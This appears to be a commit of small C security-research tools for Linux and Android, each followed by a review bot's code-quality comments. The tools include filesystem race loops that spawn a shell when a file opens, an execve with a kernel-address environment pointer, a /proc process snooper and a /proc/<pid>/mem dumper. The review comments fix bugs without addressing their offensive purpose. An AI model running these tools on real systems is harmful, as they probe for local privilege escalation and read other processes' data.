--- /dev/null
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <dirent.h>
+#include <stdio.h>
+
+int main(int argc, char *argv[]) {
+ if (argc != 2) {
+ puts("invocation: ./delayedreaddir <dirpath>");
+ return 1;
+ }
+ DIR *d = opendir(argv[1]);
+ if (d == NULL) {
+ printf("error: can't open %s - %s\n", argv[1], strerror(errno));
+ return 1;
+ }
+ printf("please press the any key...\n");
+ while (getchar() != '\n');
+ struct dirent *dent;
+ while ((dent = readdir(d)) != NULL) {
+ printf("%s ", dent->d_name);
+ }
+ printf("\n");
+}
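Review bot: The wait loop `while (getchar() != '\n');` never terminates once stdin reaches EOF (closed terminal, empty redirect), because EOF never compares equal to '\n'. Keep the result in an int and stop on either condition: `int c; while ((c = getchar()) != '\n' && c != EOF);`. The readdir loop also treats an error the same as end-of-directory; setting `errno = 0` before the loop and checking it afterwards would make a failed read visible. `closedir(d)` is never called.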
--- /dev/null
+#include <errno.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdio.h>
+
+extern char **environ;
+
+int main2() {
+ printf("trying to read the first char of the environment...\n");
+ puts(*environ);
+ printf("char read: %c\n", **environ);
+ return 0;
+}
+
+int main1() {
+ char *newenv[] = {(char *)0xffffffff80008000, NULL};
+ char *argv[] = { "evilenvexec", "stage2", NULL };
+ execve("/proc/self/exe", argv, newenv);
+ printf("execve fail: %s\n", strerror(errno));
+ return 1;
+}
+
+int main(int argc, char *argv[]) {
+ if (argc == 2) return main2();
+ return main1();
+}
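Review bot: main1 carries no comment saying what outcome the test expects, and the literal `0xffffffff80008000` only fits in a 64-bit pointer, so the cast is truncated on a 32-bit build. I would add a comment above the `newenv` line such as `/* envp[0] deliberately points outside the user address space; execve() is expected to fail (presumably EFAULT) instead of starting stage 2 */`, so that a run which does reach main2 is clearly a finding and not a pass. `int main1()` and `int main2()` should be `static int main1(void)` and `static int main2(void)`, since neither is used outside this file and empty parentheses leave the parameter list unchecked.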
--- /dev/null
+#include <unistd.h>
+
+int main(int argc, char *argv[]) {
+ if (argc != 4) return 1;
+
+ char *filename = argv[1];
+ char *filename_ = argv[2];
+ char *linktarget = argv[3];
+
+ while (1) {
+ link(filename_, filename);
+ unlink(filename);
+ symlink(linktarget, filename);
+ unlink(filename);
+ }
+}
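Review bot: The argument check `if (argc != 4) return 1;` exits silently, while the other tools in this commit print an invocation line, and the file has no header comment saying what the loop is for. Suggested: `if (argc != 4) { puts("invocation: ./<tool> <filename> <existing-file> <linktarget>"); return 1; }`, with `<tool>` replaced by the real binary name, plus a one-line comment stating that `filename` alternates forever between a hard link to argv[2] and a symlink to argv[3]. Every return value of link(), symlink() and unlink() is discarded, so a run in which each call fails (missing source file, permission error) looks identical to a working one. Checking the first iteration and reporting `strerror(errno)` would make a misconfigured test obvious.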
--- /dev/null
+#include <stdio.h>
+
+int main(void) {
+ int n, n_;
+ scanf("%d", &n);
+ while (1) {
+ n_ = n;
+ if (scanf("%d", &n) != 1) {
+ perror("read failed");
+ return 1;
+ }
+ printf("%d\n", n-n_);
+ }
+}
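Review bot: The first `scanf("%d", &n);` is unchecked, so on empty or non-numeric input `n` stays uninitialised and is then copied into `n_` and used in the subtraction, which is undefined behaviour. Guard it like the second call: `if (scanf("%d", &n) != 1) return 1;`. Inside the loop, perror() prints an unrelated errno text when scanf simply hits EOF or a parse mismatch, so a plain `fputs("read failed\n", stderr)` would be less misleading. `n-n_` can also overflow `int` for inputs of opposite sign near the limits.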
--- /dev/null
+#include <errno.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdio.h>
+
+int main(int argc, char *argv[]) {
+ if (argc != 3) { puts("invocation: ./racyopen <folder> <fileprefix>"); exit(1); }
+
+ chdir(argv[1]);
+ DIR *dir = opendir(".");
+ int prefixlen = strlen(argv[2]);
+ while (1) {
+ struct dirent *dent;
+ while ((dent = readdir(dir)) != NULL) {
+ if (dent->d_name[0] == '.' && (dent->d_name[1] == '\0' || (dent->d_name[1] == '.' && dent->d_name[2] == '\0'))) continue;
+ if (strncmp(dent->d_name, argv[2], prefixlen) == 0) {
+ int fd = open(dent->d_name, O_RDWR);
+ if (fd == -1) {
+ printf("Saw a file (%s), but couldn't open it: %s\n", dent->d_name, strerror(errno));
+ continue;
+ }
+ printf("Success! Here's your shell with open fd.\n");
+ system("/bin/sh");
+ printf("\nshell exited, resuming race\n");
+ }
+ }
+ rewinddir(dir);
+ }
+}
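Review bot: Neither `chdir(argv[1])` nor `opendir(".")` is checked, so a wrong folder argument either scans the caller's current directory or passes a NULL `DIR *` to readdir(). Suggested: `if (chdir(argv[1]) != 0) { perror(argv[1]); exit(1); }` followed by `if (dir == NULL) { perror("opendir"); exit(1); }`. The descriptor from `open()` is never closed after `system("/bin/sh")` returns, so each success leaks one fd until the process runs out; add `close(fd);` after the "shell exited" message. chdir() and close() are declared in `<unistd.h>`, which this file does not include.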
--- /dev/null
+#include <unistd.h>
+#include <errno.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdio.h>
+
+int main(int argc, char *argv[]) {
+ if (argc != 3) { puts("invocation: ./racyopen <folder> <file>"); exit(1); }
+
+ chdir(argv[1]);
+ while (1) {
+ int fd = open(argv[2], O_RDWR);
+ if (fd == -1) {
+ sched_yield();
+ continue;
+ }
+ printf("Success! Here's your shell with open fd.\n");
+ execl("/system/bin/sh", "sh", NULL);
+ printf("\nshell exited, resuming race\n");
+ }
+}
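Review bot: The line after `execl("/system/bin/sh", "sh", NULL);` is only reached when execl() fails, because a successful exec replaces the process, so "shell exited, resuming race" is printed exactly in the case where no shell ever ran. It then loops, leaking `fd` and retrying without showing the cause. Replace that printf with `fprintf(stderr, "execl failed: %s\n", strerror(errno)); exit(1);`. The variadic terminator should be `(char *)NULL`, `sched_yield()` needs `<sched.h>`, and the `chdir(argv[1])` result is unchecked; the usage string also still says `./racyopen`, the same name as the readdir-based variant.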
--- /dev/null
+// Try to print the cmdlines of all process spawns by polling /proc.
+
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <dirent.h>
+#include <stdio.h>
+
+
+static unsigned int active[65536];
+
+// assumes that *str can't be empty
+static int str_to_int(char *str) {
+ unsigned int res = 0;
+ while (1) {
+ if (*str < '0' || *str > '9') return -1;
+ res += *str - '0';
+ str++;
+ if (*str == '\0') return res;
+ res *= 10;
+ }
+}
+
+int main(int argc, char *argv[]) {
+ for (int i=0; i<65536; i++) {
+ active[i] = 0;
+ }
+
+ chdir("/proc");
+ DIR *dir = opendir(".");
+ unsigned int cycle = 2, lastcycle;
+ while (1) {
+ lastcycle = cycle-1;
+ struct dirent *dent;
+ char path[5+1+7+1];
+ while ((dent = readdir(dir)) != NULL) {
+ int name_id = str_to_int(dent->d_name);
+ if (name_id < 0 || name_id > 65535) continue;
+ if (active[name_id] != lastcycle) {
+ sprintf(path, "%s/cmdline", dent->d_name);
+ int fd = open(path, O_RDONLY);
+ if (fd != -1) {
+ char cmdline[65536];
+ int cmdline_len = read(fd, cmdline, 65536);
+ if (cmdline_len != -1) {
+ write(1, cmdline, cmdline_len);
+ write(1, "\n", 1);
+ }
+ close(fd);
+ }
+ }
+ active[name_id] = cycle;
+ }
+ rewinddir(dir);
+ cycle++;
+ }
+}
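Review bot: The filter `if (name_id < 0 || name_id > 65535) continue;` silently skips every process whose pid is above 65535, so on a host where `kernel.pid_max` has been raised the monitor has a blind spot that nothing in the output reveals. At minimum document the limit next to `active[65536]`, for example `/* pids above 65535 are not tracked; check /proc/sys/kernel/pid_max */`, or size the table from that value at start-up. The 14-byte `path` buffer is only safe because of that same range check, and `str_to_int` accumulates in an `unsigned int` that can wrap for a long digit string, so I would write `snprintf(path, sizeof path, "%s/cmdline", dent->d_name);` and not rely on it. `opendir(".")` and `chdir("/proc")` are unchecked, and cmdline is written with its embedded NUL separators, which makes the output hard to read in a terminal or log.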
--- /dev/null
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <dirent.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdlib.h>
+
+int main(int argc, char *argv[]) {
+ if (argc != 3) {
+ fputs("invocation: ./viewmem /proc/<pid>/mem <addr>\n", stderr);
+ return 1;
+ }
+ char *end;
+ errno = 0;
+ unsigned long long addr = strtoull(argv[2], &end, 0);
+ if (errno != 0 || *end != 0) {
+ fputs("invalid addr\n", stderr);
+ return 1;
+ }
+ int fd = open(argv[1], O_RDWR);
+ if (fd == -1) {
+ fprintf(stderr, "error: can't open %s - %s\n", argv[1], strerror(errno));
+ return 1;
+ }
+ fprintf(stderr, "please press the any key...\n");
+ fd = openat(fd, "", 0, O_RDWR);
+ while (getchar() != '\n');
+ fprintf(stderr, "trying to dump...");
+ errno = 0;
+ lseek(fd, addr, SEEK_SET);
+ if (errno != 0) {
+ fprintf(stderr, "lseek() failed: %s\n", strerror(errno));
+ return 1;
+ }
+ char buf[4096]; // nothing interesting has a different pagesize anyway
+ int i=0;
+ while (read(fd, buf, 4096) == 4096) {
+ write(1, buf, 4096);
+ i++;
+ }
+ fprintf(stderr, "read %i pages\n", i);
+ return 0;
+}
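Review bot: `fd = openat(fd, "", 0, O_RDWR);` overwrites the only copy of the working descriptor without checking the result, and the third and fourth arguments look swapped: openat() takes flags before mode, so this passes flags 0 and O_RDWR as the mode. An empty pathname normally fails with ENOENT, after which `fd` is -1, the original descriptor is leaked, and the user only sees "lseek() failed". Keep the result separate and test it: `int fd2 = openat(fd, "", O_RDWR); if (fd2 == -1) { perror("openat"); return 1; }`. lseek() should be checked by its return value, `== (off_t)-1`, not by errno alone, and the read loop drops a final short read and ignores the result of write().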
--- /dev/null
+/*
+ * Execute a program with weird args (e.g. an argv[0] value that doesn't match
+ * the filename or argc=0).
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include <unistd.h>
+#include <string.h>
+
+int main(int argc, char *argv[]) {
+ execvp(argv[1], argv+2);
+ fprintf(stderr, "error: %s\n", strerror(errno));
+ return 1;
+}
\ No newline at end of file
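Review bot: `execvp(argv[1], argv+2)` runs with no argc check, so invoking the tool without arguments passes a NULL file name and a pointer one past the argv terminator, an out-of-bounds read. Add `if (argc < 2) { fputs("invocation: ./<tool> <program> [argv0 [args...]]\n", stderr); return 1; }` before the call, with `<tool>` replaced by the real binary name. The `argc == 2` case still works as the header comment intends, since `argv+2` then points at the NULL terminator and the child gets argc=0. The file is missing its trailing newline.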